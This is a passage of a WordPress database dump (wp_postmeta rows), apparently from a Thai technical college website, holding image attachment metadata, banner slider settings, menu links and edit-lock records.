(898, 350, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:584;s:6:\"height\";i:400;s:4:\"file\";s:39:\"2018/01/make-merit-old-year-2560-07.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"make-merit-old-year-2560-07-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"make-merit-old-year-2560-07-300x205.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:205;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:39:\"make-merit-old-year-2560-07-400x274.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:274;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(899, 351, '_wp_attached_file', '2018/01/make-merit-old-year-2560-08.jpg'),
(900, 351, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:584;s:6:\"height\";i:400;s:4:\"file\";s:39:\"2018/01/make-merit-old-year-2560-08.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"make-merit-old-year-2560-08-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"make-merit-old-year-2560-08-300x205.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:205;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:39:\"make-merit-old-year-2560-08-400x274.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:274;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(901, 352, '_wp_attached_file', '2018/01/make-merit-old-year-2560-09.jpg'),
(902, 352, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:584;s:6:\"height\";i:400;s:4:\"file\";s:39:\"2018/01/make-merit-old-year-2560-09.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"make-merit-old-year-2560-09-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"make-merit-old-year-2560-09-300x205.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:205;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:39:\"make-merit-old-year-2560-09-400x274.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:274;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(903, 353, '_wp_attached_file', '2018/01/make-merit-old-year-2560-10.jpg');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(904, 353, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:584;s:6:\"height\";i:400;s:4:\"file\";s:39:\"2018/01/make-merit-old-year-2560-10.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"make-merit-old-year-2560-10-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"make-merit-old-year-2560-10-300x205.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:205;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:39:\"make-merit-old-year-2560-10-400x274.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:274;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(905, 354, '_edit_last', '1'),
(906, 354, '_edit_lock', '1516522848:1'),
(909, 354, '_thumbnail_id', '344'),
(929, 354, '_hide_featured', '1'),
(960, 342, '_hide_featured', '1'),
(969, 320, '_hide_featured', '1'),
(977, 384, '_menu_item_type', 'custom'),
(978, 384, '_menu_item_menu_item_parent', '0'),
(979, 384, '_menu_item_object_id', '384'),
(980, 384, '_menu_item_object', 'custom'),
(981, 384, '_menu_item_target', ''),
(982, 384, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(983, 384, '_menu_item_xfn', ''),
(984, 384, '_menu_item_url', 'https://www.facebook.com/%E0%B8%A7%E0%B8%B4%E0%B8%97%E0%B8%A2%E0%B8%B2%E0%B8%A5%E0%B8%B1%E0%B8%A2%E0%B9%80%E0%B8%97%E0%B8%84%E0%B8%99%E0%B8%B4%E0%B8%84%E0%B8%A3%E0%B8%B0%E0%B8%A2%E0%B8%AD%E0%B8%87-461966003906757/'),
(1021, 287, '_hide_featured', NULL),
(1099, 160, '_hide_featured', NULL),
(1111, 354, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575592769;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4971;}i:1;a:1:{s:2:\"id\";i:5994;}i:2;a:1:{s:2:\"id\";i:6057;}}}}'),
(1112, 287, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575684186;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4830;}i:1;a:1:{s:2:\"id\";i:4964;}i:2;a:1:{s:2:\"id\";i:4826;}}}}'),
(1113, 342, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575649017;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4945;}i:1;a:1:{s:2:\"id\";i:4711;}i:2;a:1:{s:2:\"id\";i:5769;}}}}'),
(1116, 320, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575717061;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4955;}i:1;a:1:{s:2:\"id\";i:4958;}i:2;a:1:{s:2:\"id\";i:4971;}}}}'),
(1194, 485, '_edit_lock', '1515436594:2'),
(1195, 485, '_edit_last', '2'),
(1196, 485, '_publicize_pending', '1'),
(1197, 485, '_hide_featured', '2'),
(1223, 485, '_oembed_74fd6edc29a59982c844535f9922aa49', '{{unknown}}'),
(1224, 485, '_oembed_ff1124f0b6ae34b2896957fb4e65443f', '{{unknown}}'),
(1302, 579, '_edit_lock', '1524647684:3'),
(1303, 579, '_edit_last', '1'),
(1308, 579, '_hide_featured', NULL),
(1309, 579, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575591388;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5589;}i:1;a:1:{s:2:\"id\";i:5952;}i:2;a:1:{s:2:\"id\";i:5680;}}}}'),
(1313, 579, '_wpas_done_all', '1'),
(1317, 587, '_edit_lock', '1518336529:1'),
(1318, 587, '_edit_last', '1'),
(1324, 587, '_hide_featured', NULL),
(1325, 587, '_wpas_done_all', '1'),
(1326, 587, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1572859724;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5589;}i:1;a:1:{s:2:\"id\";i:5680;}i:2;a:1:{s:2:\"id\";i:5830;}}}}'),
(1333, 592, '_wp_attached_file', '2018/01/RTC-Banner-2017-1080-200-06.png'),
(1334, 592, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:200;s:4:\"file\";s:39:\"2018/01/RTC-Banner-2017-1080-200-06.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"RTC-Banner-2017-1080-200-06-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"RTC-Banner-2017-1080-200-06-300x56.png\";s:5:\"width\";i:300;s:6:\"height\";i:56;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:39:\"RTC-Banner-2017-1080-200-06-768x142.png\";s:5:\"width\";i:768;s:6:\"height\";i:142;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:40:\"RTC-Banner-2017-1080-200-06-1024x190.png\";s:5:\"width\";i:1024;s:6:\"height\";i:190;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:38:\"RTC-Banner-2017-1080-200-06-400x74.png\";s:5:\"width\";i:400;s:6:\"height\";i:74;s:9:\"mime-type\";s:9:\"image/png\";}s:27:\"meta-slider-resized-700x300\";a:4:{s:4:\"file\";s:39:\"RTC-Banner-2017-1080-200-06-700x300.png\";s:5:\"width\";i:700;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"meta-slider-resized-0x0\";a:4:{s:4:\"file\";s:35:\"RTC-Banner-2017-1080-200-06-0x0.png\";s:5:\"width\";i:1080;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1337, 594, '_wp_attached_file', '2018/01/RTC-Banner-2017-1080-200-04.png'),
(1338, 594, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:200;s:4:\"file\";s:39:\"2018/01/RTC-Banner-2017-1080-200-04.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"RTC-Banner-2017-1080-200-04-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"RTC-Banner-2017-1080-200-04-300x56.png\";s:5:\"width\";i:300;s:6:\"height\";i:56;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:39:\"RTC-Banner-2017-1080-200-04-768x142.png\";s:5:\"width\";i:768;s:6:\"height\";i:142;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:40:\"RTC-Banner-2017-1080-200-04-1024x190.png\";s:5:\"width\";i:1024;s:6:\"height\";i:190;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:38:\"RTC-Banner-2017-1080-200-04-400x74.png\";s:5:\"width\";i:400;s:6:\"height\";i:74;s:9:\"mime-type\";s:9:\"image/png\";}s:27:\"meta-slider-resized-700x300\";a:4:{s:4:\"file\";s:39:\"RTC-Banner-2017-1080-200-04-700x300.png\";s:5:\"width\";i:700;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"meta-slider-resized-0x0\";a:4:{s:4:\"file\";s:35:\"RTC-Banner-2017-1080-200-04-0x0.png\";s:5:\"width\";i:1080;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1339, 595, '_wp_attached_file', '2018/01/RTC-Banner-2017-1080-200-05.png'),
(1340, 595, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:200;s:4:\"file\";s:39:\"2018/01/RTC-Banner-2017-1080-200-05.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"RTC-Banner-2017-1080-200-05-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"RTC-Banner-2017-1080-200-05-300x56.png\";s:5:\"width\";i:300;s:6:\"height\";i:56;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:39:\"RTC-Banner-2017-1080-200-05-768x142.png\";s:5:\"width\";i:768;s:6:\"height\";i:142;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:40:\"RTC-Banner-2017-1080-200-05-1024x190.png\";s:5:\"width\";i:1024;s:6:\"height\";i:190;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:38:\"RTC-Banner-2017-1080-200-05-400x74.png\";s:5:\"width\";i:400;s:6:\"height\";i:74;s:9:\"mime-type\";s:9:\"image/png\";}s:27:\"meta-slider-resized-700x300\";a:4:{s:4:\"file\";s:39:\"RTC-Banner-2017-1080-200-05-700x300.png\";s:5:\"width\";i:700;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"meta-slider-resized-0x0\";a:4:{s:4:\"file\";s:35:\"RTC-Banner-2017-1080-200-05-0x0.png\";s:5:\"width\";i:1080;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1341, 135, '_hide_featured', NULL),
(1342, 140, '_hide_featured', NULL),
(1343, 144, '_thumbnail_id', '592'),
(1344, 144, '_hide_featured', NULL),
(1345, 146, '_thumbnail_id', '595'),
(1346, 146, '_hide_featured', NULL),
(1351, 598, '_wp_attached_file', '2018/01/RTC-Banner-2017-1080-200-08.png'),
(1352, 598, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:200;s:4:\"file\";s:39:\"2018/01/RTC-Banner-2017-1080-200-08.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"RTC-Banner-2017-1080-200-08-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"RTC-Banner-2017-1080-200-08-300x56.png\";s:5:\"width\";i:300;s:6:\"height\";i:56;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:39:\"RTC-Banner-2017-1080-200-08-768x142.png\";s:5:\"width\";i:768;s:6:\"height\";i:142;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:40:\"RTC-Banner-2017-1080-200-08-1024x190.png\";s:5:\"width\";i:1024;s:6:\"height\";i:190;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:38:\"RTC-Banner-2017-1080-200-08-400x74.png\";s:5:\"width\";i:400;s:6:\"height\";i:74;s:9:\"mime-type\";s:9:\"image/png\";}s:27:\"meta-slider-resized-700x300\";a:4:{s:4:\"file\";s:39:\"RTC-Banner-2017-1080-200-08-700x300.png\";s:5:\"width\";i:700;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"meta-slider-resized-0x0\";a:4:{s:4:\"file\";s:35:\"RTC-Banner-2017-1080-200-08-0x0.png\";s:5:\"width\";i:1080;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1353, 599, '_menu_item_type', 'custom'),
(1354, 599, '_menu_item_menu_item_parent', '0'),
(1355, 599, '_menu_item_object_id', '599'),
(1356, 599, '_menu_item_object', 'custom'),
(1357, 599, '_menu_item_target', '_blank'),
(1358, 599, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(1359, 599, '_menu_item_xfn', ''),
(1360, 599, '_menu_item_url', 'http://wwww.technicrayong.ac.th'),
(1362, 599, '_publicize_pending', '1'),
(1363, 600, '_edit_lock', '1516186210:1'),
(1364, 600, '_edit_last', '1'),
(1365, 600, '_publicize_pending', '1'),
(1366, 600, '_hide_featured', NULL),
(1372, 607, '_edit_lock', '1519365428:3'),
(1373, 607, '_edit_last', '1'),
(1374, 607, '_publicize_pending', '1'),
(1375, 607, '_hide_featured', NULL),
(1404, 616, '_publicize_pending', '1'),
(1405, 616, 'ml-slider_settings', 'a:35:{s:4:\"type\";s:10:\"responsive\";s:6:\"random\";s:5:\"false\";s:8:\"cssClass\";s:0:\"\";s:8:\"printCss\";s:4:\"true\";s:7:\"printJs\";s:4:\"true\";s:5:\"width\";s:0:\"\";s:6:\"height\";s:0:\"\";s:3:\"spw\";i:7;s:3:\"sph\";i:5;s:5:\"delay\";s:4:\"3000\";s:6:\"sDelay\";i:30;s:7:\"opacity\";d:0.69999999999999996;s:10:\"titleSpeed\";i:500;s:6:\"effect\";s:4:\"fade\";s:10:\"navigation\";s:5:\"false\";s:5:\"links\";s:5:\"false\";s:10:\"hoverPause\";s:4:\"true\";s:5:\"theme\";s:7:\"default\";s:9:\"direction\";s:10:\"horizontal\";s:7:\"reverse\";s:5:\"false\";s:14:\"animationSpeed\";s:3:\"600\";s:8:\"prevText\";s:8:\"Previous\";s:8:\"nextText\";s:4:\"Next\";s:6:\"slices\";i:15;s:6:\"center\";s:5:\"false\";s:9:\"smartCrop\";s:4:\"true\";s:12:\"carouselMode\";s:5:\"false\";s:14:\"carouselMargin\";s:1:\"5\";s:6:\"easing\";s:6:\"linear\";s:8:\"autoPlay\";s:4:\"true\";s:11:\"thumb_width\";i:150;s:12:\"thumb_height\";i:100;s:9:\"fullWidth\";s:5:\"false\";s:10:\"noConflict\";s:5:\"false\";s:12:\"smoothHeight\";s:5:\"false\";}'),
(1406, 617, '_publicize_pending', '1'),
(1407, 617, '_thumbnail_id', '598'),
(1408, 617, '_wp_attachment_image_alt', ''),
(1409, 617, 'ml-slider_type', 'image'),
(1410, 618, '_publicize_pending', '1'),
(1411, 618, '_thumbnail_id', '595'),
(1412, 618, '_wp_attachment_image_alt', ''),
(1413, 618, 'ml-slider_type', 'image'),
(1414, 619, '_publicize_pending', '1'),
(1415, 619, '_thumbnail_id', '594'),
(1416, 619, '_wp_attachment_image_alt', ''),
(1417, 619, 'ml-slider_type', 'image'),
(1418, 620, '_publicize_pending', '1'),
(1419, 620, '_thumbnail_id', '592'),
(1420, 620, '_wp_attachment_image_alt', ''),
(1421, 620, 'ml-slider_type', 'image'),
(1422, 598, '_wp_attachment_backup_sizes', 'a:2:{s:15:\"resized-700x300\";a:5:{s:4:\"path\";s:80:\"/var/www/html/wp-content/uploads/2018/01/RTC-Banner-2017-1080-200-08-700x300.png\";s:4:\"file\";s:39:\"RTC-Banner-2017-1080-200-08-700x300.png\";s:5:\"width\";i:700;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"resized-0x0\";a:5:{s:4:\"path\";s:76:\"/var/www/html/wp-content/uploads/2018/01/RTC-Banner-2017-1080-200-08-0x0.png\";s:4:\"file\";s:35:\"RTC-Banner-2017-1080-200-08-0x0.png\";s:5:\"width\";i:1080;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}}'),
(1423, 595, '_wp_attachment_backup_sizes', 'a:2:{s:15:\"resized-700x300\";a:5:{s:4:\"path\";s:80:\"/var/www/html/wp-content/uploads/2018/01/RTC-Banner-2017-1080-200-05-700x300.png\";s:4:\"file\";s:39:\"RTC-Banner-2017-1080-200-05-700x300.png\";s:5:\"width\";i:700;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"resized-0x0\";a:5:{s:4:\"path\";s:76:\"/var/www/html/wp-content/uploads/2018/01/RTC-Banner-2017-1080-200-05-0x0.png\";s:4:\"file\";s:35:\"RTC-Banner-2017-1080-200-05-0x0.png\";s:5:\"width\";i:1080;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}}'),
(1424, 594, '_wp_attachment_backup_sizes', 'a:2:{s:15:\"resized-700x300\";a:5:{s:4:\"path\";s:80:\"/var/www/html/wp-content/uploads/2018/01/RTC-Banner-2017-1080-200-04-700x300.png\";s:4:\"file\";s:39:\"RTC-Banner-2017-1080-200-04-700x300.png\";s:5:\"width\";i:700;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"resized-0x0\";a:5:{s:4:\"path\";s:76:\"/var/www/html/wp-content/uploads/2018/01/RTC-Banner-2017-1080-200-04-0x0.png\";s:4:\"file\";s:35:\"RTC-Banner-2017-1080-200-04-0x0.png\";s:5:\"width\";i:1080;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}}'),
(1425, 592, '_wp_attachment_backup_sizes', 'a:2:{s:15:\"resized-700x300\";a:5:{s:4:\"path\";s:80:\"/var/www/html/wp-content/uploads/2018/01/RTC-Banner-2017-1080-200-06-700x300.png\";s:4:\"file\";s:39:\"RTC-Banner-2017-1080-200-06-700x300.png\";s:5:\"width\";i:700;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"resized-0x0\";a:5:{s:4:\"path\";s:76:\"/var/www/html/wp-content/uploads/2018/01/RTC-Banner-2017-1080-200-06-0x0.png\";s:4:\"file\";s:35:\"RTC-Banner-2017-1080-200-06-0x0.png\";s:5:\"width\";i:1080;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}}'),
(1426, 617, 'ml-slider_crop_position', 'center-center'),
(1427, 618, 'ml-slider_crop_position', 'center-center'),
(1428, 619, 'ml-slider_crop_position', 'center-center'),
(1429, 620, 'ml-slider_crop_position', 'center-center'),
(1462, 623, '_publicize_pending', '1'),
(1809, 628, '_publicize_pending', '1'),
(1810, 628, 'ml-slider_settings', 'a:35:{s:4:\"type\";s:10:\"responsive\";s:6:\"random\";s:5:\"false\";s:8:\"cssClass\";s:0:\"\";s:8:\"printCss\";s:4:\"true\";s:7:\"printJs\";s:4:\"true\";s:5:\"width\";s:1:\"0\";s:6:\"height\";s:1:\"0\";s:3:\"spw\";i:7;s:3:\"sph\";i:5;s:5:\"delay\";s:4:\"3000\";s:6:\"sDelay\";i:30;s:7:\"opacity\";d:0.69999999999999996;s:10:\"titleSpeed\";i:500;s:6:\"effect\";s:4:\"fade\";s:10:\"navigation\";s:5:\"false\";s:5:\"links\";s:5:\"false\";s:10:\"hoverPause\";s:4:\"true\";s:5:\"theme\";s:7:\"default\";s:9:\"direction\";s:10:\"horizontal\";s:7:\"reverse\";s:5:\"false\";s:14:\"animationSpeed\";s:3:\"600\";s:8:\"prevText\";s:8:\"Previous\";s:8:\"nextText\";s:4:\"Next\";s:6:\"slices\";i:15;s:6:\"center\";s:5:\"false\";s:9:\"smartCrop\";s:4:\"true\";s:12:\"carouselMode\";s:5:\"false\";s:14:\"carouselMargin\";s:1:\"5\";s:6:\"easing\";s:6:\"linear\";s:8:\"autoPlay\";s:4:\"true\";s:11:\"thumb_width\";i:150;s:12:\"thumb_height\";i:100;s:9:\"fullWidth\";s:5:\"false\";s:10:\"noConflict\";s:5:\"false\";s:12:\"smoothHeight\";s:5:\"false\";}'),
(1811, 629, '_wp_attached_file', '2018/01/Call-To-Action.png'),
(1812, 629, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:120;s:4:\"file\";s:26:\"2018/01/Call-To-Action.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Call-To-Action-150x120.png\";s:5:\"width\";i:150;s:6:\"height\";i:120;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Call-To-Action-300x33.png\";s:5:\"width\";i:300;s:6:\"height\";i:33;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"Call-To-Action-768x85.png\";s:5:\"width\";i:768;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"Call-To-Action-1024x114.png\";s:5:\"width\";i:1024;s:6:\"height\";i:114;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:25:\"Call-To-Action-400x44.png\";s:5:\"width\";i:400;s:6:\"height\";i:44;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"meta-slider-resized-0x0\";a:4:{s:4:\"file\";s:22:\"Call-To-Action-0x0.png\";s:5:\"width\";i:1080;s:6:\"height\";i:120;s:9:\"mime-type\";s:9:\"image/png\";}s:27:\"meta-slider-resized-1080x20\";a:4:{s:4:\"file\";s:26:\"Call-To-Action-1080x20.png\";s:5:\"width\";i:1080;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}s:27:\"meta-slider-resized-1080x80\";a:4:{s:4:\"file\";s:26:\"Call-To-Action-1080x80.png\";s:5:\"width\";i:1080;s:6:\"height\";i:80;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1813, 630, '_publicize_pending', '1'),
(1814, 630, '_thumbnail_id', '629'),
(1815, 630, '_wp_attachment_image_alt', ''),
(1816, 630, 'ml-slider_type', 'image'),
(1817, 630, 'ml-slider_url', 'http://datacenter.vec.go.th/vec_web/login.htm?mode=admission'),
(1818, 630, 'ml-slider_crop_position', 'center-center'),
(1819, 630, 'ml-slider_new_window', 'true'),
